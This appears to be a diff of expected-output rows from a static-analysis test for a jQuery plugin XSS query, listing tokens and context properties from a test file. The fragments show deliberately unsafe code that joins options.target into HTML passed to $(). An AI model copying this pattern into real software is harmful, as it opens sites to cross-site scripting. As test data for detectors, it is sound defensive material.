autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:7:139:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:7:139:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:7:139:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:7:139:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:139:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:139:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:139:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:139:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | functio ... uery\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | functio ... uery\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | functio ... uery\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | functio ... uery\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | functio ... uery\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:19:151:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:28:139:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:28:139:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:28:139:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:28:139:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:139:38:139:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:18 | intentional1 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:18 | intentional1 | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:18 | intentional1 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:18 | intentional1 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intenti ... ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intenti ... ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intenti ... ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intenti ... ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intentional1 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intentional1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intentional1 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:7:140:57 | intentional1 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:28 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:28 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:28 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:28 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:35 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:35 | options.target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:35 | options.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:35 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:57 | options ... ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:57 | options ... ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:57 | options ... ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:22:140:57 | options ... ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:30:140:35 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:30:140:35 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:30:140:35 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:30:140:35 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:40:140:57 | `
    hello
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:40:140:57 | `
    hello
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:40:140:57 | `
    hello
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:40:140:57 | `
    hello
    ` | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:41:140:56 |
    hello
    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:41:140:56 |
    hello
    | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:41:140:56 |
    hello
    | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:41:140:56 |
    hello
    | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:140:41:140:56 |
    hello
    | stringConcatenatedWith | -endpoint- | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | $(intentional1) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | $(intentional1) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | $(intentional1) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | $(intentional1) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | exceptional return of $(intentional1) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | exceptional return of $(intentional1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | exceptional return of $(intentional1) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:3:141:17 | exceptional return of $(intentional1) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:141:5:141:16 | intentional1 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:18 | intentional2 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:18 | intentional2 | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:18 | intentional2 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:18 | intentional2 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intenti ... ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intenti ... ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intenti ... ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intenti ... ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intentional2 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intentional2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intentional2 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:7:143:51 | intentional2 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:22:143:51 | `
    $ ...
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:22:143:51 | `
    $ ...
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:22:143:51 | `
    $ ...
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:22:143:51 | `
    $ ...
    ` | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:23:143:27 |
    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:23:143:27 |
    | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:23:143:27 |
    | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:23:143:27 |
    | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:23:143:27 |
    | stringConcatenatedWith | -endpoint- options.target + '
    ' | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:36 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:36 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:36 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:36 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:43 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:43 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:43 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:43 | options.target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:30:143:43 | options.target | stringConcatenatedWith | '
    ' -endpoint- '
